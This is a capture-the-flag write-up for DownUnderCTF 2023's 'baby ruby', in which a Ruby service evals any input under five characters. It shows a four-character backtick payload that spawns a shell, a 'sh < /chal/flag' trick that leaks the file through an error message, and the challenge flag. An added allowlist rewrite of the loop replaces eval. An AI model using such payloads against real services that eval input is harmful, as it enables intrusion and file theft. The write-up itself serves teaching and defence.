ctf-writeup/2023/DownUnderCTF 2023/baby ruby

baby ruby

How well do you know your Ruby?

The flag is at /chal/flag.

About the Challenge

We are given a server to connect to and the source code. Here is the content of ruby.rb:

#!/usr/bin/env ruby

while input = STDIN.gets.chomp do eval input if input.size < 5 end

The payload must be shorter than 5 characters: if our input is under 5 characters, the script passes it to eval and executes it.

How to Solve?

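Because there is no filter on the content of the input, only on its length, we can spawn a shell by inputting the following. It is 4 characters including the backticks, and Ruby backticks run the enclosed string as a shell command: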

`sh`

Because we can't use the cat command, we can use this command to obtain the flag:

sh < /chal/flag

When you run sh < /chal/flag, it instructs the sh shell to take the contents of the /chal/flag file and use them as input for shell commands. The flag is not a valid command, so the shell's error message includes it.
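From the defender's side, the length check limits the size of the input but not what it can do once it reaches eval. The following is an added example, not part of the challenge or the original write-up: the same read loop with eval replaced by an allowlist lookup. The command names and the handle/serve helpers are hypothetical.

```ruby
# Added example: ruby.rb's read loop without eval.
# Input is treated as data and looked up in a fixed table of commands.
require "stringio"

# Hypothetical commands; each maps a short name to a fixed action.
COMMANDS = {
  "ver"  => -> { RUBY_VERSION },
  "time" => -> { Time.now.utc.to_i.to_s },
  "help" => -> { "commands: #{COMMANDS.keys.sort.join(' ')}" }
}.freeze

# Exact-match lookup: the line is never parsed as Ruby, so backticks,
# method calls and other short expressions are just unknown strings.
def handle(line)
  action = COMMANDS[line]
  return "unknown command" if action.nil?

  action.call
end

# gets returns nil at EOF, so chomp only after the nil check
# (the original's STDIN.gets.chomp raises NoMethodError at EOF).
def serve(input = STDIN, output = STDOUT)
  while (line = input.gets)
    output.puts handle(line.chomp)
  end
end

# Constructed input: the four-character payload from the write-up,
# followed by an allowed command. Call serve with no arguments to use STDIN.
out = StringIO.new
serve(StringIO.new("`sh`\nver\n"), out)
print out.string
```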

flag

DUCTF{how_to_pwn_ruby_in_four_easy_steps}